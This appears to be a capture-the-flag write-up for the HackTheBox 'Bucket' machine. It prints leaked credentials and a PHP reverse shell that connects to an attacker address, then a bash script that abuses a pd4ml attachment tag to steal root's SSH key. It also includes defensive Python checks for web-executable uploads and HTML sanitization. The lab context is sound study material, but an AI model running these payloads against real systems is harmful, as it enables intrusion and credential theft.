HTB Bucket

Writeup for Bucket box on HackTheBox.eu

Initial enumeration

Port 80 is open, so we open it in a browser. The page tries to load images from s3.bucket.htb, so we add both s3.bucket.htb and bucket.htb to our hosts file.

Using ffuf doesn't show anything interesting except a shell folder:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb/FUZZ -o ffuf_10.10.10.212.json -e .html,.php,.txt -c --fl 10
http://s3.bucket.htb/shell/

AWS DynamoDB

// Run inside the DynamoDB JavaScript shell served under /shell/, where the
// `dynamodb` client and the `ppJson` pretty-printer are already defined.
var params = {
    ExclusiveStartTableName: 'table_name', // optional (for pagination, returned as LastEvaluatedTableName)
    Limit: 10, // optional (to further limit the number of table names returned per page)
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

This shows one table, users:

// Same shell as above: dump every item in the users table.
var params = {
    TableName: 'users',
};
dynamodb.scan(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

This shows us the following data:

{
    "Items": [{
        "password": {
            "S": "Management@#1@#"
        },
        "username": {
            "S": "Mgmt"
        }
    }, {
        "password": {
            "S": "Welcome123!"
        },
        "username": {
            "S": "Cloudadm"
        }
    }, {
        "password": {
            "S": "n2vM-<_K_Q:.Aa2"
        },
        "username": {
            "S": "Sysadm"
        }
    }],
    "Count": 3,
    "ScannedCount": 3
}

We test the credentials above against both SSH and AWS S3. We get a hit on AWS S3, so let's run some enumeration on this.

AWS S3 Enumeration

List the contents of the S3 bucket:

aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/

Write the following content to sh.php:

<?php
$sock=fsockopen("10.10.x.x",8443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

Upload the file to the S3 bucket:

aws --endpoint-url http://s3.bucket.htb/ s3 cp sh.php s3://adserver/sh.php

Set up a listener:

ncat -nvlp 8443

Trigger the shell (you might have to try multiple times):

curl http://bucket.htb/sh.php

This will give us a shell as the www-data user.
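The root cause of this foothold is that whatever lands in the adserver bucket is served from bucket.htb. As an added defender-side check, not part of the original writeup, the Python below parses the plain output of `aws s3 ls --recursive` (a constructed sample is embedded) and flags keys the web server would execute, including double extensions such as x.php.jpg, so the sync can be refused or alerted on.

```python
import re
from pathlib import PurePosixPath

# Extensions the web server would execute if the bucket is mirrored into the docroot.
WEB_EXEC_EXTENSIONS = {".php", ".phtml", ".phar", ".php5", ".jsp", ".cgi"}
# One `aws s3 ls --recursive` line: "<date> <time> <size> <key>"
LISTING_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2})\s+(\d+) (.+)$")

# Constructed sample output (not captured from the box).
SAMPLE_LISTING = """\
                           PRE images/
2020-09-16 10:11:02       3028 index.html
2020-09-16 10:11:02      17128 images/bug.jpg
2020-09-16 10:12:44        106 sh.php
2020-09-16 10:12:50        106 images/x.php.jpg
"""

def parse_listing(text):
    """Turn `aws s3 ls` text into dicts; 'PRE' prefix lines and blanks are skipped."""
    objects = []
    for line in text.splitlines():
        m = LISTING_RE.match(line.strip())
        if m:
            objects.append({"modified": f"{m[1]} {m[2]}", "size": int(m[3]), "key": m[4]})
    return objects

def find_web_executable_keys(text):
    """Return every key whose name carries a web-executable extension anywhere in it."""
    hits = []
    for obj in parse_listing(text):
        # suffixes catches double extensions (x.php.jpg) that a naive endswith() misses
        suffixes = {s.lower() for s in PurePosixPath(obj["key"]).suffixes}
        if suffixes & WEB_EXEC_EXTENSIONS:
            hits.append(obj["key"])
    return hits

if __name__ == "__main__":
    for key in find_web_executable_keys(SAMPLE_LISTING):
        print(f"refuse sync: web-executable object {key}")
```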

From /etc/passwd we see that roy and root are the other users with access to the server.

There is a server listening on loopback port 8000, which looks interesting.

Using Ligolo we create a tunnel so we can reach port 8000.

Kali box: [screenshot: Kali Ligolo]

Bucket box: [screenshot: Box Ligolo]

Using the password n2vM-<_K_Q:.Aa2 we try to ssh into the server as roy.

This works and we have our first flag.

Privilege escalation

Now we have read access to /var/www/bucket-app.

In here we find pd4ml_demo.jar, and looking at index.php we notice it does something strange (screenshot: PHP Data).

By the looks of the script, if we can write an entry to the alerts table with the title Ransomware and HTML in the data field, it will generate a PDF out of it.

Proxy the traffic to port 4566 again using Ligolo so we can easily add the necessary data to DynamoDB.

Create the alerts table:

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

Test the table:

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts
{
    "Items": [],
    "Count": 0,
    "ScannedCount": 0,
    "ConsumedCapacity": null
}

Doing some research into pd4ml, it looks like it has a custom HTML tag for attachments. Let's give it a go:

<pd4ml:attachment src="file:///etc/passwd"></pd4ml:attachment>

After a few failed attempts at generating invalid PDFs I ended up with the following bash script (scripted because the server cleans itself often and the files/tables disappear):

#!/bin/bash

# Recreate the alerts table (the box wipes it regularly).
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

# Insert the Ransomware entry whose HTML carries the pd4ml attachment tag.
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1  put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><pd4ml:attachment description=\"attached.txt\" type=\"paperclip\" src=\"file:///root/.ssh/id_rsa\"></pd4ml:attachment></html>"}}'

# Confirm the item is there before triggering the PDF generation.
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts

# Ask index.php to render the alerts into files/result.pdf.
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

The above script creates a new DynamoDB table, inserts our payload to grab the root id_rsa and forces the script to generate the PDF. Once the exploit runs, fetch the PDF from http://127.0.0.1:8000/files/result.pdf, download the attached file, change its permissions to 600 and ssh in as root.
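The application-side fix is to never hand raw table contents to pd4ml. The following added Python example (not the box's PHP, which this writeup does not show) rebuilds the alert HTML while dropping any pd4ml: namespaced tag and any src/href/background value that is not a relative or web URL; the sample inputs are constructed from the payload above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

BLOCKED_TAG_PREFIXES = ("pd4ml:",)          # renderer-specific tags must never come from user data
ALLOWED_SCHEMES = {"", "http", "https"}     # relative or web URLs only; no file://, no jar:, no ftp:
URL_ATTRS = {"src", "href", "background"}

class AlertHtmlSanitizer(HTMLParser):
    """Rebuilds alert HTML, dropping pd4ml tags and non-web resource URLs."""
    def __init__(self):
        super().__init__()       # convert_charrefs=True: handle_data() receives decoded text
        self.out, self.dropped = [], []   # dropped: (what, why) pairs worth logging as an alert
        self._blocked = None     # name of the blocked element we are currently inside

    def handle_starttag(self, tag, attrs):
        if self._blocked:
            return               # everything nested inside a blocked element is discarded
        if tag.startswith(BLOCKED_TAG_PREFIXES):
            self._blocked = tag
            self.dropped.append((tag, "renderer-specific tag"))
            return
        parts = [tag]
        for name, value in attrs:
            if name in URL_ATTRS and urlsplit(value or "").scheme not in ALLOWED_SCHEMES:
                self.dropped.append((f"{tag}@{name}", f"disallowed URL {value}"))
                continue
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{' '.join(parts)}>")

    def handle_endtag(self, tag):
        if self._blocked or tag.startswith(BLOCKED_TAG_PREFIXES):
            if tag == self._blocked:
                self._blocked = None
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._blocked:
            self.out.append(html.escape(data, quote=False))

def sanitize_alert_html(raw):
    # Returns (clean_html, dropped) for one 'data' value read from the alerts table.
    p = AlertHtmlSanitizer()
    p.feed(raw); p.close()
    return "".join(p.out), p.dropped

# Constructed samples: the payload from this writeup and a benign alert body.
MALICIOUS = '<html><pd4ml:attachment description="attached.txt" type="paperclip" src="file:///root/.ssh/id_rsa"></pd4ml:attachment></html>'
BENIGN = '<html><p>Ransomware alert <a href="https://bucket.htb/x">details</a></p></html>'
```

The `dropped` list is the detection signal: an alert row that needed a pd4ml tag or a file:// URL stripped is exactly the write an attacker with DynamoDB access would make.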